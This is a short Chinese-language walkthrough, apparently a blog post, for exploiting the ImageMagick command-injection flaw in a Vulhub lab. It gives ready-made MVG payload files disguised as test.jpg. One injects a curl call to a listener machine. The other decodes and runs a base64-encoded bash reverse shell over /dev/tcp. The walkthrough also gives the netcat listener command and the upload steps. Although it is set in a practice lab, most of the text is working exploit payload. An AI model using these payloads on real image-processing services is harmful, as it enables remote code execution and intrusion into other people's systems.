一、Vulhub靶场搭建
二、漏洞利用
2.1 、运行漏洞环境
#进入漏洞环境所在路径
cd /vulhub/imagemagick/imagemagick
#运行漏洞环境
docker-compose build && docker-compose up -d
2.2、构造POC文件,命名为test.jpg,脚本内容如下
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/joker.jpg"|curl "192.168.159.128:2233)'
pop graphic-context
注:脚本中192.168.159.128:2233为另一台机器的ip和端口号,改为自己的,如使用阿里云等,记得配置安全规则
2.3、开启端口监听,在192.168.159.128机器上输入nc -lvp 2233
2.4、访问漏洞环境上传POC:http://192.168.159.66/upload.php
如图所示,在192.168.159.128上可监听到URL请求数据,但无回显可使用其他POC
无回显
反弹shell,POC脚本如下,其中echo后是经过base64编码的
/bin/bash -i >& /dev/tcp/192.168.236.138/8889 0>&1请根据实际使用IP重新编码
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjM2LjEzOC84ODg5IDA+JjE | base64 -d | bash`"||id " )'
pop graphic-context
image.png
若出现以下错误可能跟系统有关,建议在server 2008或linux中进行测试
image.png











网友评论